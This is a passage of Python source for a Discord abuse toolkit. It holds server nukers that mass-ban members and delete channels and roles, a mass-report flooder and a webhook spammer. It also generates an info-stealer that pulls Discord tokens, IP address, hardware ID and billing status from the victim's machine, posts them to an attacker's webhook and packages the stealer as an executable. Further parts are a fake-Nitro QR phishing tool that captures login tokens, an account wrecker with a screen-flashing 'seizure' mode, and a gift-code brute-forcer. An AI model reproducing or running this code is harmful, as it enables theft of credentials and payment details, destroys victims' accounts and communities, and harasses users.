r = requests.delete(f"https://discord.com/api/v8/guilds/{guild}/roles/{role}", headers=headers)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Deleted Role {role.strip()}\n")
break
else:
break
def SpamChannels(self, guild, name):
while True:
json = {'name': name, 'type': 0}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/channels', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Created Channel {name}\n")
break
else:
break
def SpamRoles(self, guild, name):
while True:
json = {'name': name}
r = requests.post(f'https://discord.com/api/v8/guilds/{guild}/roles', headers=headers, json=json)
if 'retry_after' in r.text:
time.sleep(r.json()['retry_after'])
else:
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"\t\t[+] Created Role {name}\n")
break
else:
break
async def Scrape(self):
guild = input(f'\t[+] Guild ID: ')
await client.wait_until_ready()
guildOBJ = client.get_guild(int(guild))
members = await guildOBJ.chunk()
try:
os.remove("Scraped/members.txt")
os.remove("Scraped/channels.txt")
os.remove("Scraped/roles.txt")
except:
pass
membercount = 0
with open('Scraped/members.txt', 'a') as m:
for member in members:
m.write(str(member.id) + "\n")
membercount += 1
print(f"\t[#] Scraped {membercount} Members")
m.close()
channelcount = 0
with open('Scraped/channels.txt', 'a') as c:
for channel in guildOBJ.channels:
c.write(str(channel.id) + "\n")
channelcount += 1
print(f"\t[#] Scraped {channelcount} Channels")
c.close()
rolecount = 0
with open('Scraped/roles.txt', 'a') as r:
for role in guildOBJ.roles:
r.write(str(role.id) + "\n")
rolecount += 1
print(f"\t[#] Scraped {rolecount} Roles\n")
r.close()
async def NukeExecute(self):
guild = input(f'\t[+] Guild ID: ')
channel_name = input(f"\t[+] Channel Names: ")
channel_amount = input(f"\t[+] Channel Amount: ")
role_name = input(f"\t[+] Role Names: ")
role_amount = input(f"\t[+] Role Amount: ")
members = open('Scraped/members.txt')
channels = open('Scraped/channels.txt')
roles = open('Scraped/roles.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
for i in range(int(channel_amount)):
threading.Thread(target=self.SpamChannels, args=(guild, channel_name,)).start()
for i in range(int(role_amount)):
threading.Thread(target=self.SpamRoles, args=(guild, role_name,)).start()
members.close()
channels.close()
roles.close()
async def BanExecute(self):
guild = input(f'\t[+] Guild ID: ')
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.BanMembers, args=(guild, member,)).start()
members.close()
async def KickExecute(self):
guild = input(f'\t[+] Guild ID: ')
members = open('Scraped/members.txt')
for member in members:
threading.Thread(target=self.KickMembers, args=(guild, member,)).start()
members.close()
async def ChannelDeleteExecute(self):
guild = input(f'\t[+] Guild ID: ')
channels = open('Scraped/channels.txt')
for channel in channels:
threading.Thread(target=self.DeleteChannels, args=(guild, channel,)).start()
channels.close()
async def RoleDeleteExecute(self):
guild = input(f'\t[+] Guild ID: ')
roles = open('Scraped/roles.txt')
for role in roles:
threading.Thread(target=self.DeleteRoles, args=(guild, role,)).start()
roles.close()
async def ChannelSpamExecute(self):
guild = input(f'\t[+] Guild ID: ')
name = input(f"\t[+] Channel Names: ")
amount = input(f"\t[+] Amount: ")
for i in range(int(amount)):
threading.Thread(target=self.SpamChannels, args=(guild, name,)).start()
async def RoleSpamExecute(self):
guild = input(f'\t[+] Guild ID: ')
name = input(f"\t[+] Role Names: ")
amount = input(f"\t[+] Amount: ")
for i in range(int(amount)):
threading.Thread(target=self.SpamRoles, args=(guild, name,)).start()
async def PruneMembers(self):
guild = input(f'\t[+] Guild ID: ')
await guild.prune_members(days=1, compute_prune_count=False, roles=guild.roles)
async def Menu(self):
choicenuker = input(f""" {username}\\servnuker> """)
if choicenuker == 'ban':
await self.BanExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'kick':
await self.KickExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'prune':
await self.PruneMembers()
time.sleep(2)
await self.Menu()
elif choicenuker == 'dedlrole':
await self.RoleDeleteExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'delchannels':
await self.ChannelDeleteExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'croles':
await self.RoleSpamExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'cchannels':
await self.ChannelSpamExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'nuke':
await self.NukeExecute()
time.sleep(2)
await self.Menu()
elif choicenuker == 'scrape':
await self.Scrape()
time.sleep(3)
await self.Menu()
elif choicenuker == 'exit':
print()
main()
elif choicenuker == 'help':
print(f"""\n\tTool Command\tDescription\n\t------------\t-----------\n\tban\t\tBan Members\n\tkick\t\tKick Members\n\tprune\t\tPrune Members\n\tdelroles\tDelete Roles\n\tdelchannels\tDelete Channels\n\tcroles\t\tCreate Roles\n\tcchannels\tCreate Channels\n\tnuke\t\tNuke Server\n\tscrape\t\tScrape Info\n\texit\t\tReturn to Daiho Menu\n""")
await Nuker().Menu()
elif choicenuker == 'reset':
reset()
await Nuker().Menu()
else:
print(f"""\tInvalid command\n""")
await Nuker().Menu()
@client.event
async def on_ready():
await Nuker().Menu()
def Startup(self):
try:
if token_type == "user":
client.run(token, bot=False)
elif token_type == "bot":
client.run(token)
except:
print(f"""\t[!] Invalid Token\n""")
main()
startt = Nuker()
startt.Startup()
elif choice == "vidcrash":
try:
with open(f"vidcrash.bat", "w") as file:
file.write("""
@echo off
WHERE ffmpeg
IF %%ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit
set /p filepath= [#] Enter path to video file (or drag and drop the video here):
echo.
set timestamp=1
set /p timestamp= [#] Enter the time when the video should crash (in seconds):
ffprobe -i %%filepath%% -show_entries format=duration -v quiet -of csv="p=0" > tmpfile
set /p duration= < tmpfile
del tmpfile
ping 127.0.0.1 -n 3 > NUL
ffmpeg -i %%filepath%% -ss 0 -t %timestamp% part1.mp4
ffmpeg -i %%filepath%% -ss %timestamp% -t %%duration% part2.mp4
ffmpeg -i part2.mp4 -pix_fmt yuv444p part2_new.mp4
echo file part1.mp4> file_list.txt
echo file part2_new.mp4>> file_list.txt
ping 127.0.0.1 -n 3 > NUL
ffmpeg -f concat -safe 0 -i file_list.txt -codec copy crasher.mp4
del part1.mp4
del part2.mp4
del part2_new.mp4
del file_list.txt
ping 127.0.0.1 -n 3 > NUL
echo [#] Output video created! It is located at "crasher.mp4" """)
except Exception as e:
print(f"""\t\t[!] Error writing file: {e}\n""")
main()
subprocess.call([r'vidcrash.bat'])
os.remove('vidcrash.bat')
main()
elif choice == "massreport":
class massreport:
def __init__(self):
self.GUILD_ID = str(input(f"""\t[+] Enter the ID of the server where the message to be reported is located: """))
self.CHANNEL_ID = str(input(f"""\t[+] Enter the ID of the channel in which the message to be reported is located: """))
self.MESSAGE_ID = str(input(f"""\t[+] Enter the ID of the message to be reported: """))
print(f"""\n[+] Choose the reason for the report: """)
print(f"""\t [1] Illegal content""")
print(f"""\t [2] Harassment""")
print(f"""\t [3] Spam or phishing links""")
print(f"""\t [4] Self-harm""")
print(f"""\t [5] NSFW content\n""")
REASON = input(f"""\t[#] Choice: """)
if REASON == '1':
self.REASON = 0
elif REASON == '2':
self.REASON = 1
elif REASON == '3':
self.REASON = 2
elif REASON == '4':
self.REASON = 3
elif REASON == '5':
self.REASON = 4
else:
print(f"""\t[!] Your request is invalid !\n""")
main()
self.RESPONSES = {f"""
\t\t[!] 401: Unauthorized: [!] Invalid Discord token,
\t\t[!] Missing Access: [!] Missing access to channel or guild,
\t\t[!] You need to verify your account in order to perform this action: [!] Unverified"""}
self.sent = 0
self.errors = 0
def _reporter(self):
report = requests.post(
'https://discordapp.com/api/v8/report', json={
'channel_id': self.CHANNEL_ID,
'message_id': self.MESSAGE_ID,
'guild_id': self.GUILD_ID,
'reason': self.REASON
}, headers={
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'sv-SE',
'User-Agent': 'Discord/21295 CFNetwork/1128.0.1 Darwin/19.6.0',
'Content-Type': 'application/json',
'Authorization': self.TOKEN
}
)
if (status := report.status_code) == 201:
self.sent += 1
print(f"""\t\t[!] Reported successfully""")
elif status in (401, 403):
self.errors += 1
print(self.RESPONSES[report.json()['message']])
else:
self.errors += 1
print(f"""\t\t[!] Error: {report.text} | Status Code: {status}""")
def _multi_threading(self):
while True:
if threading.active_count() <= 300:
time.sleep(1)
threading.Thread(target=self._reporter).start()
def setup(self):
recognized = None
if os.path.exists(config_json := 'Config.json'):
with open(config_json, 'r') as f:
try:
data = json.load(f)
self.TOKEN = data['discordToken']
except (KeyError, json.decoder.JSONDecodeError):
recognized = False
else:
recognized = True
else:
recognized = False
if not recognized:
self.TOKEN = usertoken
with open(config_json, 'w') as f:
json.dump({'discordToken': self.TOKEN}, f)
print()
self._multi_threading()
mr = massreport()
mr.setup()
elif choice == "wspam":
webhook = input(f"""\t[+] Webhooks url for spam: """)
message = input(f"""\t[+] Message to Spam: """)
timer = input(f"""\t[+] Amount of time for the attack (s): """)
try:
timeout = time.time() + 1 * float(timer) + 2
while time.time() < timeout:
response = requests.post(
webhook,
json = {"content" : message},
params = {'wait' : True}
)
os.system('cls' if os.name == 'nt' else 'clear')
time.sleep(1)
if response.status_code == 204 or response.status_code == 200:
print(f"""\t\t[!] Message sent""")
elif response.status_code == 429:
print(f"""\t\t[!] Rate limited ({response.json()['retry_after']}ms)""")
time.sleep(response.json()["retry_after"] / 1000)
else:
print(f"""\t\t[!] Error code: {response.status_code}""")
except:
print(f"""\t[!] Your request is invalid !\n""")
main()
elif choice == "filegrab":
global filename, webhooklink
fileName = input(f"""\t[+] Enter the name you want to give to the final file: """)
webhooklink = input(f"""\t[+] Enter your WebHook to generate a Token Grabber containing it: """)
try:
with open(f"{fileName}.py", "w") as file:
file.write("""import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\\\Discord",
"Discord Canary" : ROAMING + "\\\\discordcanary",
"Discord PTB" : ROAMING + "\\\\discordptb",
"Google Chrome" : LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera" : ROAMING + "\\\\Opera Software\\\\Opera Stable",
"Brave" : LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex" : LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\\nPhone: {phone}\\nNitro: {nitro}\\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\\nUsername: {pc_username}\\nPC Name: {pc_name}\\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("~~TOKENURLHERE~~", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
main()""".replace("~~TOKENURLHERE~~", webhooklink))
except Exception as e:
print(f"""\t\t[!] Error writing file: {e}\n""")
main()
print(f"""\t[#] File has been correctly written to "{fileName}.py"\n""")
convert = input(f"""\n\t[+] Convert your script into an executable (Yes | No) ? """).lower()
if convert == 'yes':
try:
os.system(f"pyinstaller -y -F {fileName}.py")
os.remove(f"{fileName}.spec")
shutil.rmtree(f"build")
shutil.rmtree(f"__pycache__")
print(f"""\n\t[#] The executable file has been correctly generated. Look in "dist" folder\n""")
except Exception as e:
print(f"\t\t[!] Error: {e}")
else:
print()
main()
elif choice == "imggrab":
print(f"""\tNon-operational...\n""")
main()
elif choice == "qrgen":
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'additional/chromedriver.exe')
driver.get('https://discord.com/login')
time.sleep(5)
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qr_code = div.find('img')['src']
file = os.path.join(os.getcwd(), 'additional/qr_code.png')
img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
with open(file,'wb') as handler:
handler.write(img_data)
discord_login = driver.current_url
bg = Image.open('additional/back.png')
qrcode = Image.open('additional/qr_code.png')
qrcode = qrcode.resize(size=(127, 127))
bg.paste(qrcode, (87, 313))
discord = Image.open('additional/discord.png')
discord = discord.resize(size=(40, 40))
bg.paste(discord, (130, 355), discord)
bg.save('NitroGift.png')
print(f"""\t[#] QR Code has been generated - [Image: "NitroGift.png"]""")
while True:
if discord_login != driver.current_url:
token = driver.execute_script('''
var req = webpackJsonp.push([
[], {
extra_id: (e, t, r) => e.exports = r
},
[
["extra_id"]
]
]);
for (let e in req.c)
if (req.c.hasOwnProperty(e)) {
let t = req.c[e].exports;
if (t && t.__esModule && t.default)
for (let e in t.default) "getToken" === e && (token = t.default.getToken())
}
return token;
''')
print(f"""\n\t[#] A token has been found: {token}""")
break
print(f"""\t[!] The FakeNitro has been scanned - Token successfully grabbed\n""")
main()
elif choice == "ipgrab":
print(f"""\tNon-operational...\n""")
main()
elif choice == "accnuker":
def nuke(usertoken, Server_Name, message_Content):
print(f"\t[#] Daiho Nuke Deployed")
if threading.active_count() <= 100:
t = threading.Thread(target=CustomSeizure, args=(usertoken, ))
t.start()
headers = {'Authorization': usertoken}
channelIds = requests.get("https://discord.com/api/v9/users/@me/channels", headers=getheaders(usertoken)).json()
for channel in channelIds:
try:
requests.post(f'https://discord.com/api/v9/channels/'+channel['id']+'/messages',
headers=headers,
data={"content": f"{message_Content}"})
print(f"\t\t[!] Messaged ID: "+channel['id'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Sent a Message to all available friends")
guildsIds = requests.get("https://discord.com/api/v7/users/@me/guilds", headers=getheaders(usertoken)).json()
for guild in guildsIds:
try:
requests.delete(
f'https://discord.com/api/v7/users/@me/guilds/'+guild['id'],
headers=getheaders(usertoken))
print(f"\t\t[!] Left guild: "+guild['name'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
for guild in guildsIds:
try:
requests.delete(f'https://discord.com/api/v7/guilds/'+guild['id'], headers=getheaders(usertoken))
print(f'\t\t[!] Deleted guild: '+guild['name'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Deleted/Left all available guilds")
friendIds = requests.get("https://discord.com/api/v9/users/@me/relationships", headers=getheaders(usertoken)).json()
for friend in friendIds:
try:
requests.delete(
f'https://discord.com/api/v9/users/@me/relationships/'+friend['id'], headers=getheaders(usertoken))
print(f"\t\t[!] Removed friend: "+friend['user']['username']+"#"+friend['user']['discriminator'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Removed all available friends")
for i in range(100):
try:
payload = {'name': f'{Server_Name}', 'region': 'europe', 'icon': None, 'channels': None}
requests.post('https://discord.com/api/v7/guilds', headers=getheaders(usertoken), json=payload)
print(f"\t\t[!] Created {Server_Name} #{i}")
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Created all servers")
t.do_run = False
setting = {
'theme': "light",
'locale': "ja",
'message_display_compact': False,
'inline_embed_media': False,
'inline_attachment_media': False,
'gif_auto_play': False,
'render_embeds': False,
'render_reactions': False,
'animate_emoji': False,
'convert_emoticons': False,
'enable_tts_command': False,
'explicit_content_filter': '0',
'status': "idle"
}
requests.patch("https://discord.com/api/v7/users/@me/settings", headers=getheaders(usertoken), json=setting)
j = requests.get("https://discordapp.com/api/v9/users/@me", headers=getheaders(usertoken)).json()
a = j['username'] + "#" + j['discriminator']
print(f"\n\t[#] Succesfully turned {a} into a holl\n")
main()
def CustomSeizure(token):
print(f'\t[#] Starting seizure mode (Switching on/off Light/dark mode)')
t = threading.currentThread()
while getattr(t, "do_run", True):
modes = cycle(["light", "dark"])
setting = {'theme': next(modes), 'locale': random.choice(['ja', 'zh-TW', 'ko', 'zh-CN'])}
requests.patch("https://discord.com/api/v7/users/@me/settings", headers=getheaders(usertoken), json=setting)
Server_Name = str(input(
f'\t[+] Name of the servers that will be created: '))
message_Content = str(input(
f'\t[+] Message that will be sent to every friend: '))
r = requests.get(
'https://discord.com/api/v9/users/@me',
headers=getheaders(usertoken))
threads = 100
if threading.active_count() < threads:
threading.Thread(target=nuke, args=(usertoken, Server_Name, message_Content)).start()
return
elif choice == "dacc":
sure = input("\t[#] Are you sure you want to permanently Disable this account (Yes | No) ? ").lower()
if sure == "yes":
res = requests.patch('https://discordapp.com/api/v9/users/@me', headers=getheaders(usertoken), json={'date_of_birth': '2020-1-11'})
if res.status_code == 400:
res_message = res.json().get('date_of_birth', ['no response message'])[0]
if res_message == "You need to be 13 or older in order to use Discord.":
print(f'\t[!] Token successfully disabled\n')
elif res_message == "You cannot update your date of birth.":
print(f'\t[!] Account can\'t be disabled\n')
else:
print(f'\t[!] Unknown response: {res_message}\n')
else:
print('\t[!] Failed to disable account\n')
main()
elif choice == "info":
headers = {
'Authorization': usertoken,
'Content-Type': 'application/json'
}
languages = {
'da' : 'Danish, Denmark',
'de' : 'German, Germany',
'en-GB' : 'English, United Kingdom',
'en-US' : 'English, United States',
'es-ES' : 'Spanish, Spain',
'fr' : 'French, France',
'hr' : 'Croatian, Croatia',
'lt' : 'Lithuanian, Lithuania',
'hu' : 'Hungarian, Hungary',
'nl' : 'Dutch, Netherlands',
'no' : 'Norwegian, Norway',
'pl' : 'Polish, Poland',
'pt-BR' : 'Portuguese, Brazilian, Brazil',
'ro' : 'Romanian, Romania',
'fi' : 'Finnish, Finland',
'sv-SE' : 'Swedish, Sweden',
'vi' : 'Vietnamese, Vietnam',
'tr' : 'Turkish, Turkey',
'cs' : 'Czech, Czechia, Czech Republic',
'el' : 'Greek, Greece',
'bg' : 'Bulgarian, Bulgaria',
'ru' : 'Russian, Russia',
'uk' : 'Ukranian, Ukraine',
'th' : 'Thai, Thailand',
'zh-CN' : 'Chinese, China',
'ja' : 'Japanese',
'zh-TW' : 'Chinese, Taiwan',
'ko' : 'Korean, Korea'
}
cc_digits = {
'american express': '3',
'visa': '4',
'mastercard': '5'
}
res = requests.get('https://discordapp.com/api/v6/users/@me', headers=headers)
if res.status_code == 200:
res_json = res.json()
user_name = f'{res_json["username"]}#{res_json["discriminator"]}'
user_id = res_json['id']
avatar_id = res_json['avatar']
avatar_url = f'https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}.gif'
phone_number = res_json['phone']
email = res_json['email']
mfa_enabled = res_json['mfa_enabled']
flags = res_json['flags']
locale = res_json['locale']
verified = res_json['verified']
language = languages.get(locale)
creation_date = datetime.utcfromtimestamp(((int(user_id) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')
has_nitro = False
res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headers)
nitro_data = res.json()
has_nitro = bool(len(nitro_data) > 0)
if has_nitro:
d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
days_left = abs((d2 - d1).days)
billing_info = []
for x in requests.get('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers=headers).json():
yy = x['billing_address']
name = yy['name']
address_1 = yy['line_1']
address_2 = yy['line_2']
city = yy['city']
postal_code = yy['postal_code']
state = yy['state']
country = yy['country']
if x['type'] == 1:
cc_brand = x['brand']
cc_first = cc_digits.get(cc_brand)
cc_last = x['last_4']
cc_month = str(x['expires_month'])
cc_year = str(x['expires_year'])
data = {
'Payment Type': 'Credit Card',
'Valid': not x['invalid'],
'CC Holder Name': name,
'CC Brand': cc_brand.title(),
'CC Number': ''.join(z if (i + 1) % 2 else z + ' ' for i, z in enumerate((cc_first if cc_first else '*') + ('*' * 11) + cc_last)),
'CC Exp. Date': ('0' + cc_month if len(cc_month) < 2 else cc_month) + '/' + cc_year[2:4],
'Address 1': address_1,
'Address 2': address_2 if address_2 else '',
'City': city,
'Postal Code': postal_code,
'State': state if state else '',
'Country': country,
'Default Payment Method': x['default']
}
elif x['type'] == 2:
data = {
'Payment Type': 'PayPal',
'Valid': not x['invalid'],
'PayPal Name': name,
'PayPal Email': x['email'],
'Address 1': address_1,
'Address 2': address_2 if address_2 else '',
'City': city,
'Postal Code': postal_code,
'State': state if state else '',
'Country': country,
'Default Payment Method': x['default']
}
billing_info.append(data)
print(f"""\t[#] Basic Information:""")
print(f"""\t\t[+] Username: {user_name}""")
print(f"""\t\t[+] User ID: {user_id}""")
print(f"""\t\t[+] Creation Date: {creation_date}""")
print(f"""\t\t[+] Avatar URL: {avatar_url if avatar_id else ""}""")
print(f"""\t\t[+] Token: {usertoken}""")
print(f"""\n\t[#] Nitro Information:""")
print(f"""\t\t[+] Nitro Status: {has_nitro}""")
if has_nitro:
print(f"""\t\t[+] Expires in: {days_left} day(s)""")
else:
print(f"""\t\t[+] Expires in: None day(s)""")
print(f"""\n\t[#] Contact Information:""")
print(f"""\t\t[+] Phone Number: {phone_number if phone_number else ""}""")
print(f"""\t\t[+] Email: {email if email else ""}""")
if len(billing_info) > 0:
print(f"""\n\t[#] Billing Information:""")
if len(billing_info) == 1:
for x in billing_info:
for key, val in x.items():
if not val:
continue
print('\t\t[+] {:<23}{}{}'.format(key, "", val))
else:
for i, x in enumerate(billing_info):
title = f'\n\t[#] Payment Method #{i + 1} ({x["Payment Type"]})'
print(' ' + title)
print(' ' + ('=' * len(title)))
for j, (key, val) in enumerate(x.items()):
if not val or j == 0:
continue
print('\t\t[+] {:<23}{}{}'.format(key, "", val))
if i < len(billing_info) - 1:
print('\n')
print(f"""\n\t[#] Account Security:""")
print(f"""\t\t[+] 2FA/MFA Enabled: {mfa_enabled}""")
print(f"""\t\t[+] Flags: {flags}""")
print(f"""\n\t[#] Other:""")
print(f"""\t\t[+] Locale: {locale} ({language})""")
print(f"""\t\t[+] Email Verified: {verified}\n""")
elif res.status_code == 401:
print(f"""\n\t[#] Invalid token\n""")
else:
print(f"""\n\t[#] An error occurred while sending request\n""")
main()
elif choice == "autolog":
print()
driver = webdriver.Chrome(executable_path=r'additional/chromedriver.exe')
driver.maximize_window()
driver.get('https://discord.com/login')
js = 'function login(token) {setInterval(() => {document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`}, 50);setTimeout(() => {location.reload();}, 500);}'
time.sleep(3)
driver.execute_script(js + f'login("{usertoken}")')
time.sleep(10)
if driver.current_url == 'https://discord.com/login':
print(f"""\t[!] Connection Failed\n""")
driver.close()
else:
print(f"""\t[!] Connection Established\n""")
main()
elif choice == "nitrogen":
class NitroGen:
def __init__(self):
self.fileName = "NitroCodes.txt"
def main(self):
num = int(input(f"""\t[+] Input How Many Codes to Generate and Check: """))
url = input(f"""\t[+] Do you wish to use a discord webhook? - [If so type it here or press enter to ignore] """)
webhook = url if url != "" else None
valid = []
invalid = 0
for i in range(num):
try:
code = "".join(random.choices(
string.ascii_uppercase + string.digits + string.ascii_lowercase,
k = 16
))
url = f"https://discord.gift/{code}"
result = self.quickChecker(url, webhook)
if result:
valid.append(url)
else:
invalid += 1
except Exception as e:
print(f"\t\t[!] Error : {url}")
print(f"""
\t[+] Results:
\t [!] Valid: {len(valid)}
\t [!] Invalid: {invalid}
\t [!] Valid Codes: {', '.join(valid )}\n""")
main()
def generator(self, amount):
with open(self.fileName, "w", encoding="utf-8") as file:
print(f"\t[#] Wait, Generating for you")
start = time.time()
for i in range(amount):
code = "".join(random.choices(
string.ascii_uppercase + string.digits + string.ascii_lowercase,
k = 16
))
file.write(f"https://discord.gift/{code}\n")
print(f"\tGenned {amount} codes | Time taken: {round(time.time() - start, 5)}s\n") #
def fileChecker(self, notify = None):
valid = []
invalid = 0
with open(self.fileName, "r", encoding="utf-8") as file:
for line in file.readlines():
nitro = line.strip("\n")
url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"
response = requests.get(url)
if response.status_code == 200:
print(f"\t\t[!] VALID NITRO: {nitro}")
valid.append(nitro)
if notify is not None:
DiscordWebhook(
url = notify,
content = f"@everyone | A valid Nitro has been found => {nitro}"
).execute()
else:
break
else:
print(f"\t\t[!] INVALID NITRO: {nitro}")
invalid += 1
return {"valid" : valid, "invalid" : invalid}
def quickChecker(self, nitro, notify = None):
url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"
response = requests.get(url)
if response.status_code == 200:
print(f"\t\t[!] VALID NITRO: {nitro}", flush=True)
with open("NitroCodes.txt", "w") as file:
file.write(nitro)
if notify is not None:
DiscordWebhook(
url = notify,
content = f"@everyone | A valid Nitro has been found => {nitro}"
).execute()
return True
else:
print(f"\t\t[!] INVALID NITRO: {nitro}", flush=True)
return False
Gen = NitroGen()
Gen.main()
elif choice == "nsniper":
data = {}
bot = commands.Bot(command_prefix=".", self_bot=True)
global ready
ready = False
codeRegex = re.compile("(discord.com/gifts/|discordapp.com/gifts/|discord.gift/)([a-zA-Z0-9]+)")
while 1:
try:
@bot.event
async def on_message(ctx):
global ready
if not ready:
print(f"""\t[#] Sniping Discord Nitro and Giveaway on {str(len(bot.guilds))} Servers""")
print("\t[#] Bot is ready\n")
ready = True
if codeRegex.search(ctx.content):
code = codeRegex.search(ctx.content).group(2)
start_time = time.time()
if len(code) < 16:
try:
print(f"""\t\t[#] Auto-detected a fake code: {code} From {ctx.author.name}#{ctx.author.discriminator} [{ctx.guild.name}>{ctx.channel.name}]""")
except:
print(f"""\t\t[#] Auto-detected a fake code: {code} From {ctx.author.name}#{ctx.author.discriminator}""")
else:
async with httpx.AsyncClient() as client:
result = await client.post('https://discordapp.com/api/v6/entitlements/gift-codes/' + code + '/redeem',json={'channel_id': str(ctx.channel.id)},headers={'authorization': usertoken, 'user-agent': 'Mozilla/5.0'})
delay = (time.time() - start_time)
try:
